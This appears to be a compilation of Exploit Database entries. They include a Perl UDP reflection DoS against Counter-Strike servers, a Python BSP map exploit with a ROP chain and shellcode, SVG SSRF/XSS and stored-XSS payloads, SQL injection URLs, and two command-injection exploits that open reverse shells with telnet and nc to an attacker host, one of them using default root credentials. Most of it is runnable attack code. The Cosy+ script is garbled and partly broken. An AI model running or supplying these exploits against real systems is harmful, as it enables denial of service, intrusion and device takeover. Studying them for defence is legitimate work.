EDB Note: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47454.bsp
#!/usr/bin/perl
#
# Counter-Strike 1.6 'GameInfo' Query Reflection DoS
# Proof Of Concept
#
# Copyright 2015 (c) Todor Donev
# todor.donev@gmail.com
# http://www.ethical-hacker.org/
# https://www.facebook.com/ethicalhackerorg
# http://pastebin.com/u/hackerscommunity
#
#
# Disclaimer:
# This or previous program is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
# Use at your own risk and educational
# purpose ONLY!
#
# See also, UDP-based Amplification Attacks:
# https://www.us-cert.gov/ncas/alerts/TA14-017A
#
# # perl cstrike-drdos-poc.pl 46.165.194.16 192.168.1.10 27010
# [ Counter-Strike 1.6 'GameInfo' query reflection dos poc
# [ Sending GameInfo requests: 46.165.194.16 -> 192.168.1.10
# ^C
#
# # tcpdump -i eth0 -c4 port 27010
# tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
# listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes
# 00:00:00.000000 IP 192.168.1.10.31337 > masterserver.css.setti.info.27010: UDP, length 25
# 00:00:00.000000 IP masterserver.css.setti.info.27010 > 192.168.1.10.31337: UDP, length 1392
# 00:00:00.000000 IP 192.168.1.10.31337 > masterserver.css.setti.info.27010: UDP, length 25
# 00:00:00.000000 IP masterserver.css.setti.info.27010 > 192.168.1.10.31337: UDP, length 1392
# 4 packets captured
# 4 packets received by filter
# 0 packets dropped by kernel
use strict;
use Socket;
use warnings;
no warnings 'uninitialized';
print "[ Counter-Strike 1.6 \'GameInfo\' query reflection dos poc\n";
die "[ Sorry, must be run as root. This script use RAW Socket.\n" if ($< != 0);
my $css = (gethostbyname($ARGV[0]))[4]; # IP Address Destination (32 bits)
my $victim = (gethostbyname($ARGV[1]))[4]; # IP Address Source (32 bits)
my $port = $ARGV[2] || '27015'; # Int between 1 and 65535 Default: 27015
die "[ Port must be between 1 and 65535!\n" if ($port < 1 || $port > 65535);
if (!defined $css || !defined $victim) {
print "[ Usg: $0 <cstrike server> <victim> <port>\n";
print "[ Default port: 27015\n";
print "[ <todor.donev\@gmail.com> Todor Donev\n";
exit;
}
print "[ Sending GameInfo requests: $ARGV[0] -> $ARGV[1]\n";
socket(RAW, AF_INET, SOCK_RAW, 255) || die $!;
setsockopt(RAW, 0, 1, 1) || die $!;
main();
# Main program
sub main {
my $packet;
$packet = iphdr();
$packet .= udphdr();
$packet .= cshdr();
# b000000m...
send_packet($packet);
}
# IP header (Layer 3)
sub iphdr {
my $ip_ver = 4; # IP Version 4 (4 bits)
my $iphdr_len = 5; # IP Header Length (4 bits)
my $ip_tos = 0; # Differentiated Services (8 bits)
my $ip_total_len = $iphdr_len + 20; # IP Header Length + Data (16 bits)
my $ip_frag_id = 0; # Identification Field (16 bits)
my $ip_frag_flag = 000; # IP Frag Flags (R DF MF) (3 bits)
my $ip_frag_offset = 0000000000000; # IP Fragment Offset (13 bits)
my $ip_ttl = 255; # IP TTL (8 bits)
my $ip_proto = 17; # IP Protocol (8 bits)
my $ip_checksum = 0; # IP Checksum (16 bits)
# IP Packet
my $iphdr = pack(
'H2 H2 n n B16 h2 c n a4 a4',
$ip_ver . $iphdr_len, $ip_tos,
$ip_total_len, $ip_frag_id,
$ip_frag_flag . $ip_frag_offset,
$ip_ttl, $ip_proto, $ip_checksum,
$victim, $css
);
return $iphdr;
}
# UDP Header (Layer 4)
sub udphdr {
my $udp_src_port = 31337; # UDP Sort Port (16 bits) (0-65535)
my $udp_dst_port = $port; # UDP Dest Port (16 btis) (0-65535)
my $udp_len = 8 + length(cshdr()); # UDP Length (16 bits) (0-65535)
my $udp_checksum = 0; # UDP Checksum (16 bits) (XOR of header)
# UDP Packet
my $udphdr = pack(
'n n n n',
$udp_src_port,
$udp_dst_port,
$udp_len,
$udp_checksum
);
return $udphdr;
}
# Counter-Strike 'GameInfo' request
sub cshdr {
#
# https://developer.valvesoftware.com/wiki/Server_queries
#
# https://developer.valvesoftware.com/wiki/Source_RCON_Protocol
# Requests
# The server responds to 5 queries:
#
# A2S_INFO 'T' (0x54)
# Basic information about the server.
# A2S_PLAYER 'U' (0x55)
# Details about each player on the server.
# A2S_RULES 'V' (0x56)
# The rules the server is using.
# A2A_PING 'i' (0x69)
# Ping the server. (DEPRECATED)
# A2S_SERVERQUERY_GETCHALLENGE 'W' (0x57)
# Returns a challenge number for use in the player and rules query. (DEPRECATED)
#
# Queries should be sent in UDP packets to the listen port of the server.
#
# 25 bytes - A2S_INFO
my $query = "\xff\xff\xff\xff\x54"; # 0000 ff ff ff ff 54 53 6f 75 72 63 65 20 45 6e 67 69 ....TSource Engi
$query .= "\x53\x6f\x75\x72\x63"; # 0010 6e 65 20 51 75 65 72 79 00 ne Query.
$query .= "\x65\x20\x45\x6e\x67";
$query .= "\x69\x6e\x65\x20\x51";
$query .= "\x75\x65\x72\x79\x00";
my $cshdr = pack('a*', $query);
return $cshdr;
}
sub send_packet {
while(1){
select(undef, undef, undef, 0.40); # Sleep 400 milliseconds
send(RAW, $_[0], 0, pack('Sna4x8', AF_INET, 60, $css)) || die $!;
}
}
So I’ve been holding onto this neat little gem of a .bsp that has four bytes very close to the end of the file that controls the memory allocator. See above picture. Works on all supported operating systems last I checked (so Linux, Windows, and macOS), even after a few years.
Download ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/48187.bsp
#!/usr/bin/env python
# Counter Strike: Condition Zero BSP map exploit
# By @Digital_Cold Jun 11, 2017
#
# E-DB Note: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42325.zip (bsp-exploit-source.zip)
#
from binascii import hexlify, unhexlify
from struct import pack, unpack
import math
import mmap
import logging
fmt = "[+] %(message)s"
logging.basicConfig(level=logging.INFO, format=fmt)
l = logging.getLogger("exploit")
# Specific to the file
INDEX_BUFFER_OFF = 0x92ee0 # ARRAY[int]
VERTEX_BUFFER_INDEXES_OFF = 0xA9174 # ARRAY[unsigned short]
VERTEX_DATA_OFF = 0x37f7c # ARRAY[VEC3], VEC3[float, float, float]
NUM_EDGES_OFF = 0x70f94 # The length that was fuzzed to cause the crash
# No longer used as could not find a gadget to 'pop, pop, pop esp, ret'
# SEH_OVERWRITE_OFF = 0x4126C
# Initial offset into the index buffer where the function to exploit resides
INITIAL_OFFSET = 0xb130 # this is multiplied by 4 for data type size already
# INDEX_BUFFER
# 0: 20
# 1: 10
# 2: 2 --> Vertex Buffer Indexes
# VERTEX BUFFER INDEXES
# 0: 1
# 1: 2
# 2: 4 --> Vertex Data
# VERTEX DATA
# 0: 1.23, 23423.0, 3453.3
# 1: 1.23, -9.0, 3453.3
# 2: 1.0, 1.0, 1.0
# 3: 1.0, 1.0, 1.0
# 4: 0.0, 1.0, 0.0
# Example:
# a = INDEX_BUFFER[2] ; a = 2
# b = VERTEX_BUFFER[a] ; b = 4
# vec = VERTEX_DATA[b] ; vec = 0.0, 1.0, 0.0
def dw(x):
return pack("I", x)
def main():
target_file = "eip-minimized.bsp"
output_file = "exploit-gen.bsp"
print "GoldSource .BSP file corruptor"
print " by @Digital_Cold"
print
l.info("Corrupting target file %s" % target_file)
# Read in and memory map target file
fp = open(target_file, 'rb')
mmfile = mmap.mmap(fp.fileno(), 0, access = mmap.ACCESS_READ | mmap.ACCESS_COPY)
fp.close()
VEC3_COUNT = 63
# then come Saved EBP and return address
start_idx = INDEX_BUFFER_OFF + INITIAL_OFFSET
second_idx = VERTEX_BUFFER_INDEXES_OFF
vertex_data_start = VERTEX_DATA_OFF + 12*0x1000 # arbitrary offset, lower causes faults
l.info("Writing to index buffer offset %08x...", start_idx)
l.info("Vertex buffer indexes start %08x", second_idx)
l.info("Vertex data at %08x", vertex_data_start)
data_buffer = []
for i in range(VEC3_COUNT):
for j in range(3):
data_buffer.append(str(chr(0x41+i)*4)) # easy to see pattern in memory
data_buffer.append("\x00\x00\x00\x00") # dont care
data_buffer.append("\x00\x00\x00\x00") # unk1
data_buffer.append("\x00\x00\x00\x00") # unk2
data_buffer.append("\x00\x00\x00\x00") # numVerts (needs to be zero to skip tail call)
data_buffer.append("\x00\x00\x00\x00") # EBP
data_buffer.append(dw(0x01407316)) # Saved Ret --> POP EBP; RET [hl.exe]
# XXX: bug in mona. This is a ptr to VirtualProtectEx!!
# 0x387e01ec, # ptr to &VirtualProtect() [IAT steamclient.dll]
"""
Register setup for VirtualAlloc() :
--------------------------------------------
EAX = NOP (0x90909090)
ECX = flProtect (0x40)
EDX = flAllocationType (0x1000)
EBX = dwSize
ESP = lpAddress (automatic)
EBP = ReturnTo (ptr to jmp esp)
ESI = ptr to VirtualAlloc()
EDI = ROP NOP (RETN)
--- alternative chain ---
EAX = ptr to &VirtualAlloc()
ECX = flProtect (0x40)
EDX = flAllocationType (0x1000)
EBX = dwSize
ESP = lpAddress (automatic)
EBP = POP (skip 4 bytes)
ESI = ptr to JMP [EAX]
EDI = ROP NOP (RETN)
+ place ptr to "jmp esp" on stack, below PUSHAD
--------------------------------------------
"""
# START ROP CHAIN
# DEP disable ROP chain
# rop chain generated with mona.py - www.corelan.be
#
# useful for finding INT3 gadget - !mona find -s ccc3 -type bin -m hl,steamclient,filesystem_stdio
rop_gadgets = [
#0x3808A308, # INT3 # RETN [steamclient.dll]
0x38420ade, # POP EDX # RETN [steamclient.dll]
0x387e01e8, # ptr to &VirtualAlloc() [IAT steamclient.dll]
0x381236c5, # MOV ESI,DWORD PTR DS:[EDX] # ADD DH,DH # RETN [steamclient.dll]
0x381ebdc1, # POP EBP # RETN [steamclient.dll]
0x381f98cd, # & jmp esp [steamclient.dll]
0x387885ac, # POP EBX # RETN [steamclient.dll]
0x00000001, # 0x00000001-> ebx
0x384251c9, # POP EDX # RETN [steamclient.dll]
0x00001000, # 0x00001000-> edx
0x387cd449, # POP ECX # RETN [steamclient.dll]
0x00000040, # 0x00000040-> ecx
0x386c57fe, # POP EDI # RETN [steamclient.dll]
0x385ca688, # RETN (ROP NOP) [steamclient.dll]
0x0140b00e, # POP EAX # RETN [hl.exe]
0x90909090, # nop
0x385c0d3e, # PUSHAD # RETN [steamclient.dll]
]
# Can be replaced with ANY shellcode desired...
# http://shell-storm.org/shellcode/files/shellcode-662.php
shellcode = "\xFC\x33\xD2\xB2\x30\x64\xFF\x32\x5A\x8B" + \
"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x33\xC9" + \
"\xB1\x18\x33\xFF\x33\xC0\xAC\x3C\x61\x7C" + \
"\x02\x2C\x20\xC1\xCF\x0D\x03\xF8\xE2\xF0" + \
"\x81\xFF\x5B\xBC\x4A\x6A\x8B\x5A\x10\x8B" + \
"\x12\x75\xDA\x8B\x53\x3C\x03\xD3\xFF\x72" + \
"\x34\x8B\x52\x78\x03\xD3\x8B\x72\x20\x03" + \
"\xF3\x33\xC9\x41\xAD\x03\xC3\x81\x38\x47" + \
"\x65\x74\x50\x75\xF4\x81\x78\x04\x72\x6F" + \
"\x63\x41\x75\xEB\x81\x78\x08\x64\x64\x72" + \
"\x65\x75\xE2\x49\x8B\x72\x24\x03\xF3\x66" + \
"\x8B\x0C\x4E\x8B\x72\x1C\x03\xF3\x8B\x14" + \
"\x8E\x03\xD3\x52\x68\x78\x65\x63\x01\xFE" + \
"\x4C\x24\x03\x68\x57\x69\x6E\x45\x54\x53" + \
"\xFF\xD2\x68\x63\x6D\x64\x01\xFE\x4C\x24" + \
"\x03\x6A\x05\x33\xC9\x8D\x4C\x24\x04\x51" + \
"\xFF\xD0\x68\x65\x73\x73\x01\x8B\xDF\xFE" + \
"\x4C\x24\x03\x68\x50\x72\x6F\x63\x68\x45" + \
"\x78\x69\x74\x54\xFF\x74\x24\x20\xFF\x54" + \
"\x24\x20\x57\xFF\xD0"
shellcode += "\xeb\xfe" # infinite loop! (we dont want hl.exe to crash)
shellcode += "\xeb\xfe"
shellcode += "\xeb\xfe"
shellcode += "\xeb\xfe"
shellcode += "\xeb\xfe"
shellcode_dwords = int(math.ceil(len(shellcode)/4.0))
extra_dwords = int(math.ceil((len(rop_gadgets)+shellcode_dwords)/3.0))
# Loop count (needs to be the exact amount of ROP we want to write
data_buffer.append(dw(extra_dwords))
for addr in rop_gadgets:
data_buffer.append(dw(addr))
for b in range(shellcode_dwords):
data = ""
for byte in range(4):
idx = byte + b*4
# pad to nearest DWORD with INT3
if idx >= len(shellcode):
data += "\xcc"
else:
data += shellcode[idx]
data_buffer.append(data)
second_idx += 8000*4 # time 4 because we skip every-other WORD, which means each index has 4 bytes
# 8000 is arbitrary, but it doesn't cause the map load to exit with a FATAL before
# we can exploit the function
# UNCOMMENT TO CHANGE INITIAL SIZE OF OVERFLOW
#mmfile[NUM_EDGES_OFF] = pack("B", 0x41)
for i in range(int(math.ceil(len(data_buffer)/3.0))):
mmfile[start_idx+4*i:start_idx+4*(i+1)] = pack("I", 8000+i)
mmfile[second_idx+2*i:second_idx+2*(i+1)] = pack("H", 0x1000+i)
second_idx += 2 # required because the game loads every-other word
# This data will now be on the stack
for j in range(3):
sub_idx = j*4 + i*0xc
data_idx = i*3 + j
towrite = ""
if data_idx >= len(data_buffer):
towrite = "\x00"*4
else:
towrite = data_buffer[i*3 + j]
mmfile[vertex_data_start+sub_idx:vertex_data_start+sub_idx+4] = towrite
#l.debug("Write[%08x] --> offset %d" % (unpack("I", towrite)[0], vertex_data_start+sub_idx))
# write out the corrupted file
outfile = open(output_file, "wb")
outfile.write(mmfile)
outfile.close()
l.info("Wrote %d byte exploit file to %s" % (len(mmfile), output_file))
l.info("Copy to game maps/ directory!")
if __name__ == "__main__":
main()
# Exploit Title: CouchCMS 2.2.1 - SSRF via SVG file upload
# Date: 2021-01-25
# Exploit Author: xxcdd
# Vendor Homepage: https://github.com/CouchCMS/CouchCMS
# Software Link: https://github.com/CouchCMS/CouchCMS
# Version: v2.2.1
# Tested on: Windows 7
An issue was discovered in CouchCMS v2.2.1 (https://github.com/CouchCMS/CouchCMS/issues/130) that allows SSRF via an /couch/includes/kcfinder/browse.php SVG upload.
upload url is :/couch/includes/kcfinder/browse.php?nonce=[yournonce]&type=file&CKEditor=f_main_content&CKEditorFuncNum=1&langCode=en
ssrf.svg content:
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="
http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"
width="200" height="200">
<image height="200" width="200" xlink:href="http://<test_ip>:1234" />
</svg>
# Exploit Title: CouchCMS 2.2.1 - XSS via SVG file upload
# Date: 2021-01-25
# Exploit Author: xxcdd
# Vendor Homepage: https://github.com/CouchCMS/CouchCMS
# Software Link: https://github.com/CouchCMS/CouchCMS
# Version: v2.2.1
# Tested on: Windows 7
An issue was discovered in CouchCMS v2.2.1 (https://github.com/CouchCMS/CouchCMS/issues/130) that allows XSS via an /couch/includes/kcfinder/browse.php SVG upload.
upload url is :/couch/includes/kcfinder/browse.php?nonce=[yournonce]&type=file&CKEditor=f_main_content&CKEditorFuncNum=1&langCode=en
<http://127.0.0.1/couch/includes/kcfinder/browse.php?nonce=02b16f710f786c61f34e301eae552bdf&type=file&CKEditor=f_main_content&CKEditorFuncNum=1&langCode=en>
xss.svg content:
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "
http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900"
stroke="#004400"/>
<script type="text/javascript">
alert(document.cookie);
</script>
</svg>
# Exploit Title: Cotonti Siena 0.9.19 - 'maintitle' Stored Cross-Site Scripting
# Date: 2021-15-06
# Exploit Author: Fatih İLGİN
# Vendor Homepage: cotonti.com
# Vulnerable Software: https://www.cotonti.com/download/siena_0919
# Affected Version: 0.9.19
# Tested on: Windows 10
# Vulnerable Parameter Type: POST
# Vulnerable Parameter: maintitle
# Attack Pattern: "><img src=1 href=1 onerror="javascript:alert(1)"></img>
# Description
1) Entering the Admin Panel (vulnerableapplication.com/cotonti/admin.php)
2) Then go to Configuration tab and set payload ("><img src=1 href=1 onerror="javascript:alert(1)"></img>) for Site title param
3) Then click Update button
4) In the end, Go to home page then shown triggered vulnerability
# Proof of Concepts
Request;
POST /cotonti/admin.php?m=config&n=edit&o=core&p=title&a=update HTTP/1.1
Host: vulnerableapplication.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101
Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 440
Origin: https://vulnerableapplication.com
Connection: close
Referer:
https://vulnerableapplication/cotonti/admin.php?m=config&n=edit&o=core&p=title
Cookie:
__cmpconsentx19318=CPH17mBPH17mBAfUmBENBeCsAP_AAH_AAAYgG9tf_X_fb3_j-_59__t0eY1f9_7_v-0zjheds-8Nyd_X_L8X_2M7vB36pr4KuR4ku3bBAQdtHOncTQmx6IlVqTPsb02Mr7NKJ7PEmlsbe2dYGH9_n9XT_ZKZ79_____7________77______3_v__9-BvbX_1_329_4_v-ff_7dHmNX_f-_7_tM44XnbPvDcnf1_y_F_9jO7wd-qa-CrkeJLt2wQEHbRzp3E0JseiJVakz7G9NjK-zSiezxJpbG3tnWBh_f5_V0_2Sme_f____-________--______9_7___fgAAA;
__cmpcccx19318=aBPH17mCgAADAAXAA0AB4AQ4DiQKnAAA;
_ga=GA1.2.1498194981.1623770561; _gid=GA1.2.1196246770.1623770561;
__gads=ID=63f33aa9dd32c83c-220723d35ec800e9:T=1623770613:RT=1623770613:S=ALNI_MZ0ifDGVpIXuopc8JXvo208SRTYmA;
PHPSESSID=ahmanvhckp2o5g5rnpr4cnj9c3
&x=701dad27076b1d78&maintitle=%22%3E%3Cimg+src%3D1+href%3D1+onerror%3D%22javascript%3Aalert(1)%22%3E%3C%2Fimg%3E&subtitle=Subtitle&metakeywords=&title_users_details=%7BUSER%7D%3A+%7BNAME%7D&title_header=%7BSUBTITLE%7D+-+%7BMAINTITLE%7D&title_header_index=%7BMAINTITLE%7D+-+%7BDESCRIPTION%7D&subject_mail=%7BSITE_TITLE%7D+-+%7BMAIL_SUBJECT%7D&body_mail=%7BMAIL_BODY%7D%0D%0A%0D%0A%7BSITE_TITLE%7D+-+%7BSITE_URL%7D%0D%0A%7BSITE_DESCRIPTION%7D
Response;
HTTP/1.1 200 OK
Date: Tue, 15 Jun 2021 16:07:59 GMT
Server: Apache
Expires: Mon, Apr 01 1974 00:00:00 GMT
Cache-Control: no-store,no-cache,must-revalidate, post-check=0,pre-check=0
Pragma: no-cache
Last-Modified: Tue, 15 Jun 2021 04:07:59 GMT
Vary: Accept-Encoding
X-Robots-Tag: noindex,nofollow
Content-Length: 4366
Connection: close
Content-Type: text/html; charset=UTF-8
<h1 class="body"><a href="admin.php" title="Administration
panel">Administration panel</a> / <a href="admin.php?m=config"
title="Configuration">Configuration</a> / <a
href="admin.php?m=config&n=edit&o=core&p=title" title="Titles
and Metas">Titles and Metas</a></h1>
<div id="main" class="body clear">
<h2>Configuration</h2>
<div class="done">
<h4>Done</h4>
<ul>
<li>Updated</li>
</ul>
</div>
source: https://www.securityfocus.com/bid/48028/info
Cotonti is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
Cotonti 0.9.2 is vulnerable; other versions may also be affected.
http://www.example.com/users.php?s=-2+AND+31337=0
http://www.example.com/forums.php?m=topics&s=offtopic&ord=-2+AND+31337=0
source: https://www.securityfocus.com/bid/54147/info
Cotonti is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
Cotonti 0.6.23 is vulnerable; other versions may also be affected.
http://www.example.com/admin.php?m=hits&f=year&v=1[SQLi]
# Exploit Title: Cosy+ firmware 21.2s7 - Command Injection
# Google Dork: N/A
# Date: 2024-8-20
# Exploit Author: CodeB0ss
# Contact: t.me/codeb0ss / uncodeboss@gmail.com
# Version: 21.2s7
# Tested on: Windows 11 Home Edition
# CVE: CVE-2024-33896
import socket
import subprocess
import time
def configcreator(file_path):
with open(file_path, 'w') as f: f.write( """ client dev tun persist-tun
proto tcp verb 5 mute 20 --up '/bin/sh -c "TF=$(mktemp -u);mkfifo
$TF;telnet {attacker_ip} 5000 0<$TF | sh 1>$TF"' script-security 2 """) def
l3st(port): server_socket = socket.socket(socket.AF_INET,
socket.SOCK_STREAM) server_socket.bind(('0.0.0.0', port))
server_socket.listen(1) print(f" - --> Listening_0n_port {port}")
client_socket, _ = server_socket.accept() print(" - --> Recevied") while
True: data = client_socket.recv(1024) if not data: break
print(data.decode()) client_socket.close() server_socket.close() if name ==
"main": IP = '127.0.0.1' config = '/path/to/malicious_config.ovpn' port =
5000 listener_process = subprocess.Popen(['python', '-c', f'from main
import start_listener; start_listener({port})']) time.sleep(2)
create_malicious_openvpn_config(config) print(f" - --> config_created
{config}")
GitHub:
https://github.com/codeb0ss/CVE-2024-33896-PoC
Hey,
Overview: The Ewon Cosy+ is a VPN gateway used for remote access and
maintenance in industrial environments. The manufacturer describes the
product as follows (see [1]): "The Ewon Cosy+ gateway establishes a secure
VPN connection between the machine (PLC, HMI, or other devices) and the
remote engineer. The connection happens through Talk2m, a highly secured
industrial cloud service. The Ewon Cosy+ makes industrial remote access
easy and secure like never before!" Due to improper neutralization of
parameters read from a user-controlled configuration file, an authenticated
attacker is able to inject and execute OS commands on the device.
Vulnerability Details: Authenticated attackers are able to upload a custom
OpenVPN configuration. This configuration can contain the OpenVPN
paramaters "--up" and "--down", which execute a specified script or
executable. Since the process itself runs with the highest privileges
(root), this allows the device to be completely compromised.
# Title : CoSoSys Endpoint Protector - Authenticated Remote Root Command Injection
# Date : Vulnerability submitted in 01/12/2017 and published in 01/08/2018
# Author : 0x09AL
# Tested on : Endpoint Protector 4.5.0.1
# Software Link : https://www.endpointprotector.com/
# Vulnerable Versions : Endpoint Protector <= 4.5.0.1
# Endpoint Protector suffers from an authenticated command injection vulnerability. By default the username and password are : root:epp2011
# In the Appliance Tab , Server Maintenance the NTP Server field is vulnerable to command injection. There is a call to sh -c {NTP Server field} which is not validated. Attached is the exploit which does this automatically.
# The command may take a while to execute.
import requests
exp = requests.session()
user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0'
username = 'root'
password = 'epp2011'
host = 'x.x.x.x.x'
rev_host = 'x.x.x.x'
rev_port = '443'
r = exp.post('https://%s/index.php/login' % host,data={'username':username,'password':password,'login':'Login'},verify=False)
shell = 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc %s %s >/tmp/f' % (rev_host,rev_port)
payload = '&& %s' % shell
print payload
if(r.text.find("Welcome Guest")>0):
print "[-] Incorrect credentials [-]"
else:
print "[+] Logged in successfully [+]"
r = exp.get('https://%s/index.php/appliance/maintenance' % host,headers={'X-Requested-With': 'XMLHttpRequest'},verify=False)
if(r.text.find("csrf")>-1):
print "[+] Getting CSRF Token [+]"
csrf_token = r.text.split('value="')[1].split('">')[0]
print "[+] Token: %s [+]" % csrf_token
post_data = {
'csrf_token' : csrf_token,
'continent' :'Europe',
'region' :'Berlin',
'timeSetting[ntpserver]' : payload,
'timeSetting[timesync]' :'12'
}
r = exp.post('https://%s/index.php/appliance/timezone' % host,data=post_data,headers={'X-Requested-With': 'XMLHttpRequest','Referer': 'https://%s/index.php/' % host},verify=False)
print "[+] Sending exploit [+]"
if(r.text.find("nc")>-1):
post_data = {
'ntpserver': payload,
'continent' :'Europe',
'region' :'Berlin'
}
r = exp.post('https://%s/index.php/appliance/timezone' % host,data=post_data,headers={'X-Requested-With': 'XMLHttpRequest','Referer': 'https://%s/index.php/' % host},verify=False)
print "[+] Exploit success [+]"